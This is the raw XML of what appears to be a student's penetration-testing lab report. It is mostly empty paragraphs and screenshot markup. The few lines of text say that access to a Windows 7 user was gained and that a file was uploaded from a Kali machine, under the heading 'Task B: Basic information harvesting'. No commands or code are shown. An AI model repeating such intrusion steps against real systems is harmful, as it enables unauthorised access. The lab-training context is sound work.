    <w:p w14:paraId="455A8526" w14:textId="7C6A93AD" w:rsidR="00A976BB" w:rsidRDefault="00924C35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EAC104E" wp14:editId="174032F6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>235585</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3933190"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="18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ompu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We now have access to the windows 7 user </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB048E3" w14:textId="0A222D6D" w:rsidR="006F248A" w:rsidRDefault="006F248A"/>
    <w:p w14:paraId="5C356EBC" w14:textId="08E60EB9" w:rsidR="006F248A" w:rsidRDefault="006F248A"/>
    <w:p w14:paraId="7CCF7C4F" w14:textId="3EE0F03D" w:rsidR="006F248A" w:rsidRDefault="006F248A"/>
    <w:p w14:paraId="566D32A5" w14:textId="363CBFA8" w:rsidR="006F248A" w:rsidRDefault="006F248A"/>
    <w:p w14:paraId="53915018" w14:textId="08BA8E2D" w:rsidR="006F248A" w:rsidRDefault="006F248A"/>
    <w:p w14:paraId="77ED0593" w14:textId="5AFBBF34" w:rsidR="006F248A" w:rsidRDefault="006F248A"/>
    <w:p w14:paraId="06E30FD3" w14:textId="4FE2D4A3" w:rsidR="006F248A" w:rsidRDefault="006F248A"/>
    <w:p w14:paraId="4C0459E4" w14:textId="5DF95026" w:rsidR="006F248A" w:rsidRDefault="006F248A"/>
    <w:p w14:paraId="4084B738" w14:textId="3E75AB06" w:rsidR="006F248A" w:rsidRDefault="006F248A"/>
    <w:p w14:paraId="432ECA30" w14:textId="750F7870" w:rsidR="006F248A" w:rsidRDefault="006F248A"/>
    <w:p w14:paraId="6D8C5B31" w14:textId="3C936667" w:rsidR="006F248A" w:rsidRDefault="006F248A"/>
    <w:p w14:paraId="7DCC6424" w14:textId="252ABA68" w:rsidR="006F248A" w:rsidRDefault="006F248A"/>
    <w:p w14:paraId="733DEF09" w14:textId="2A082282" w:rsidR="006F248A" w:rsidRDefault="006F248A"/>
    <w:p w14:paraId="1520A0FB" w14:textId="1FCC892A" w:rsidR="006F248A" w:rsidRDefault="006F248A"/>
    <w:p w14:paraId="04B6CAC8" w14:textId="738E08CF" w:rsidR="006F248A" w:rsidRDefault="006F248A"/>
    <w:p w14:paraId="2AF4E935" w14:textId="10A36169" w:rsidR="006F248A" w:rsidRDefault="006F248A"/>
    <w:p w14:paraId="66DCB3BD" w14:textId="3BE83526" w:rsidR="006F248A" w:rsidRDefault="006F248A"/>
    <w:p w14:paraId="564BC453" w14:textId="33B795F8" w:rsidR="006F248A" w:rsidRDefault="006F248A"/>
    <w:p w14:paraId="25012190" w14:textId="37715C51" w:rsidR="006F248A" w:rsidRDefault="006F248A"/>
    <w:p w14:paraId="12EF6273" w14:textId="04A09326" w:rsidR="006F248A" w:rsidRDefault="006F248A"/>
    <w:p w14:paraId="1F39C337" w14:textId="0602E77B" w:rsidR="006F248A" w:rsidRDefault="006F248A"/>
    <w:p w14:paraId="38770CA3" w14:textId="4A2C9079" w:rsidR="006F248A" w:rsidRDefault="006F248A"/>
    <w:p w14:paraId="2AAF41D5" w14:textId="207D53FC" w:rsidR="006F248A" w:rsidRDefault="006F248A"/>
    <w:p w14:paraId="030BA897" w14:textId="714F6B9D" w:rsidR="006F248A" w:rsidRDefault="006F248A"/>
    <w:p w14:paraId="0EE0602D" w14:textId="50D64562" w:rsidR="006F248A" w:rsidRDefault="006F248A"/>
    <w:p w14:paraId="4730B2CB" w14:textId="3247E8B1" w:rsidR="006F248A" w:rsidRDefault="006F248A"/>
    <w:p w14:paraId="0BB6AB11" w14:textId="2565FB8D" w:rsidR="006F248A" w:rsidRDefault="006F248A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task B: Basic information harvesting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54700E56" w14:textId="44DE6433" w:rsidR="006F248A" w:rsidRDefault="006F248A" w:rsidP="006F248A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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8D5CCFB" wp14:editId="712145F8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>571342</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5435600</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3933190"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="20" name="Picture 2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applicati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51211D00" wp14:editId="45BBD431">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-564356</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>216058</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3933190"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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6DB5C" w14:textId="7F2A061B" w:rsidR="006F248A" w:rsidRDefault="006F248A" w:rsidP="006F248A"/>
    <w:p w14:paraId="0A393FA2" w14:textId="514AED36" w:rsidR="006F248A" w:rsidRDefault="006F248A" w:rsidP="006F248A"/>
    <w:p w14:paraId="427B15C5" w14:textId="06FF08A7" w:rsidR="006F248A" w:rsidRDefault="006F248A" w:rsidP="006F248A"/>
    <w:p w14:paraId="00FB993B" w14:textId="4F322681" w:rsidR="006F248A" w:rsidRDefault="006F248A" w:rsidP="006F248A"/>
    <w:p w14:paraId="51FBF3F0" w14:textId="49CA11A8" w:rsidR="006F248A" w:rsidRDefault="006F248A" w:rsidP="006F248A"/>
    <w:p w14:paraId="68144135" w14:textId="6C166CA9" w:rsidR="006F248A" w:rsidRDefault="006F248A" w:rsidP="006F248A"/>
    <w:p w14:paraId="33538A81" w14:textId="26F53B20" w:rsidR="006F248A" w:rsidRDefault="006F248A" w:rsidP="006F248A"/>
    <w:p w14:paraId="28EA004F" w14:textId="341AADB1" w:rsidR="006F248A" w:rsidRDefault="006F248A" w:rsidP="006F248A"/>
    <w:p w14:paraId="7E8634B7" w14:textId="7DA15360" w:rsidR="006F248A" w:rsidRDefault="006F248A" w:rsidP="006F248A"/>
    <w:p w14:paraId="310896AB" w14:textId="3188DD49" w:rsidR="006F248A" w:rsidRDefault="006F248A" w:rsidP="006F248A"/>
    <w:p w14:paraId="6A9E1814" w14:textId="4E0E99F2" w:rsidR="006F248A" w:rsidRDefault="006F248A" w:rsidP="006F248A"/>
    <w:p w14:paraId="2134BB39" w14:textId="7EFF392B" w:rsidR="006F248A" w:rsidRDefault="006F248A" w:rsidP="006F248A"/>
    <w:p w14:paraId="2041210E" w14:textId="7D9DE86E" w:rsidR="006F248A" w:rsidRDefault="006F248A" w:rsidP="006F248A"/>
    <w:p w14:paraId="2DEAB5B4" w14:textId="20498A0B" w:rsidR="006F248A" w:rsidRDefault="006F248A" w:rsidP="006F248A"/>
    <w:p w14:paraId="40417EB2" w14:textId="2BA63D12" w:rsidR="006F248A" w:rsidRDefault="006F248A" w:rsidP="006F248A"/>
    <w:p w14:paraId="23819D2E" w14:textId="3E77A5AF" w:rsidR="006F248A" w:rsidRDefault="006F248A" w:rsidP="006F248A"/>
    <w:p w14:paraId="0F1BF85A" w14:textId="3F135D00" w:rsidR="006F248A" w:rsidRDefault="006F248A" w:rsidP="006F248A"/>
    <w:p w14:paraId="64E3ADB4" w14:textId="0D8BB107" w:rsidR="006F248A" w:rsidRDefault="006F248A" w:rsidP="006F248A"/>
    <w:p w14:paraId="43131CD4" w14:textId="4F45CF33" w:rsidR="006F248A" w:rsidRDefault="006F248A" w:rsidP="006F248A"/>
    <w:p w14:paraId="442ABDBB" w14:textId="36BD7F7B" w:rsidR="006F248A" w:rsidRDefault="006F248A" w:rsidP="006F248A"/>
    <w:p w14:paraId="1ED075A4" w14:textId="3E3DD3E5" w:rsidR="006F248A" w:rsidRDefault="006F248A" w:rsidP="006F248A"/>
    <w:p w14:paraId="64F6BE53" w14:textId="68F05097" w:rsidR="006F248A" w:rsidRDefault="006F248A" w:rsidP="006F248A"/>
    <w:p w14:paraId="665093E9" w14:textId="3C47306E" w:rsidR="006F248A" w:rsidRDefault="006F248A" w:rsidP="006F248A"/>
    <w:p w14:paraId="1219BD30" w14:textId="007B8A05" w:rsidR="006F248A" w:rsidRDefault="006F248A" w:rsidP="006F248A"/>
    <w:p w14:paraId="1E6AA268" w14:textId="7BE53949" w:rsidR="006F248A" w:rsidRDefault="006F248A" w:rsidP="006F248A"/>
    <w:p w14:paraId="23D39221" w14:textId="6FCAABEF" w:rsidR="006F248A" w:rsidRDefault="00FA7F33" w:rsidP="006F248A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D32D4C1" w14:textId="4774611A" w:rsidR="00FA7F33" w:rsidRDefault="00FA7F33" w:rsidP="006F248A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EC7E4C8" wp14:editId="674B1BBF">
            <wp:extent cx="5943600" cy="3933190"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="21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comput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DFFCE" w14:textId="520B681D" w:rsidR="00FA7F33" w:rsidRDefault="00FA7F33" w:rsidP="006F248A"/>
    <w:p w14:paraId="1AA5F80E" w14:textId="6C29EA8E" w:rsidR="00FA7F33" w:rsidRDefault="00FA7F33" w:rsidP="006F248A"/>
    <w:p w14:paraId="1F182FA4" w14:textId="7DE86956" w:rsidR="00FA7F33" w:rsidRDefault="00FA7F33" w:rsidP="006F248A"/>
    <w:p w14:paraId="581E0260" w14:textId="124DF9B7" w:rsidR="00FA7F33" w:rsidRDefault="00FA7F33" w:rsidP="006F248A"/>
    <w:p w14:paraId="547196FA" w14:textId="24B9E930" w:rsidR="00FA7F33" w:rsidRDefault="00FA7F33" w:rsidP="006F248A"/>
    <w:p w14:paraId="0B338D4A" w14:textId="53C001DC" w:rsidR="00FA7F33" w:rsidRDefault="00FA7F33" w:rsidP="006F248A"/>
    <w:p w14:paraId="081434AF" w14:textId="0A35D64C" w:rsidR="00FA7F33" w:rsidRDefault="00FA7F33" w:rsidP="006F248A"/>
    <w:p w14:paraId="4E6AE857" w14:textId="76603D6D" w:rsidR="00FA7F33" w:rsidRDefault="00FA7F33" w:rsidP="006F248A"/>
    <w:p w14:paraId="6521670C" w14:textId="4D7B194A" w:rsidR="00FA7F33" w:rsidRDefault="00FA7F33" w:rsidP="006F248A"/>
    <w:p w14:paraId="0686153C" w14:textId="60E9611B" w:rsidR="00FA7F33" w:rsidRDefault="00FA7F33" w:rsidP="006F248A"/>
    <w:p w14:paraId="743F3F7E" w14:textId="3973BA30" w:rsidR="00FA7F33" w:rsidRDefault="00FA7F33" w:rsidP="006F248A"/>
    <w:p w14:paraId="27BA8F31" w14:textId="3B1416C7" w:rsidR="00FA7F33" w:rsidRDefault="00FA7F33" w:rsidP="006F248A"/>
    <w:p w14:paraId="4A9F5F7F" w14:textId="2C559917" w:rsidR="00FA7F33" w:rsidRDefault="00FA7F33" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56504088" w14:textId="1C370657" w:rsidR="00021C77" w:rsidRDefault="00FA7F33" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FB0A2E" w14:textId="1767FF7A" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Here I made a text file on internal kali and uploaded it to windows 7 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE29576" w14:textId="3D32C9DB" w:rsidR="00FA7F33" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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29936A7" wp14:editId="795A6354">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>420130</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>43678</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4865923" cy="2891481"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:wrapNone/>
            <wp:docPr id="22" name="Picture 2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923" cy="2891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E1F7B" w14:textId="03F66660" w:rsidR="00FA7F33" w:rsidRDefault="00FA7F33" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC34E60" w14:textId="75CC645A" w:rsidR="00FA7F33" w:rsidRDefault="00FA7F33" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10AE8BDA" w14:textId="77777777" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63A7057B" w14:textId="77777777" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6201FB5A" w14:textId="77777777" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B426B39" w14:textId="77777777" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C08098F" w14:textId="77777777" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="685D1DA6" w14:textId="77777777" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="699072EE" w14:textId="77777777" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48C35984" w14:textId="77777777" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="111E031C" w14:textId="77777777" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46DD8BAF" w14:textId="77777777" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FD9A55A" w14:textId="77777777" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34810E9A" w14:textId="77777777" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F1B872D" w14:textId="77777777" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F809756" w14:textId="62DE63B6" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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4E8826D" wp14:editId="57CF07B3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>354599</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>143126</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3531870"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24" name="Picture 2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01DC9" w14:textId="37F3043D" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2142A1A1" w14:textId="5B211F4D" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F1162DF" w14:textId="77777777" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72D76E8F" w14:textId="5E910CF1" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CF915D7" w14:textId="7FC926B1" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D8438EB" w14:textId="1A59DD14" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F7876F4" w14:textId="600AA6C4" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31927C12" w14:textId="098DFE63" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52D98144" w14:textId="39D39C7E" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D7E36FD" w14:textId="77777777" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44802010" w14:textId="77777777" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7148F219" w14:textId="6430AAC7" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46DC052E" w14:textId="77777777" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A60A383" w14:textId="77777777" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="010489ED" w14:textId="651AA859" w:rsidR="00021C77" w:rsidRDefault="00211F54" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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4AB95ADD" wp14:editId="540E90DD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4498697</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-92462</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="306000" cy="214560"/>
                <wp:effectExtent l="38100" t="38100" r="0" b="40005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30600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6978FD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7" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:353.55pt;margin-top:-8pt;width:25.55pt;height:18.3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">
                <v:imagedata r:id="rId24" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EC8967" w14:textId="1C974487" w:rsidR="00021C77" w:rsidRDefault="00211F54" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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722CBA58" wp14:editId="131407A0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1407737</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-165057</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3599640" cy="523800"/>
                <wp:effectExtent l="38100" t="38100" r="7620" b="4826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3599640" cy="52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3743A" id="Ink 26" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:110.15pt;margin-top:-13.7pt;width:284.9pt;height:42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">
                <v:imagedata r:id="rId26" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="47094A04" w14:textId="697BB353" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43A9CA8F" w14:textId="25DDB148" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E46F44C" w14:textId="359FCE87" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D3328B6" w14:textId="1E1586DD" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37C92B66" w14:textId="71848273" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08CBF85E" w14:textId="7AACCB53" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="728F18D5" w14:textId="0656468E" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36DD7C2B" w14:textId="44930BEE" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="583D7DD4" w14:textId="4A111C16" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D6F4B51" w14:textId="01A9154E" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EA311A0" w14:textId="60E7FB1E" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E99AAF4" w14:textId="207F2722" w:rsidR="00ED7C47" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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500D09DA" wp14:editId="2CE5DA0E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-45444</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-719166</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3531870"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28" name="Picture 28" descr="A picture containing text, screensho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screenshot, monito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011E1" w14:textId="4C1AC997" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB4926D" w14:textId="3C624101" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2064A24D" w14:textId="4FB31CC5" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25637F45" w14:textId="75163B67" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70F1C73D" w14:textId="067573DD" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62EA8CC5" w14:textId="5B275734" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F49467A" w14:textId="09216EF8" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62AADFDB" w14:textId="505AC480" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45314A93" w14:textId="0F06CEB5" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1334BF69" w14:textId="0A2577BB" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="368D6AD6" w14:textId="6A485DC5" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75423A16" w14:textId="29C6B97C" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="151CACE1" w14:textId="50246D3A" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="736C8277" w14:textId="197C940D" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42884D98" w14:textId="0215859B" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EB3466E" w14:textId="0A472F67" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AF0858A" w14:textId="7E21C2F2" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
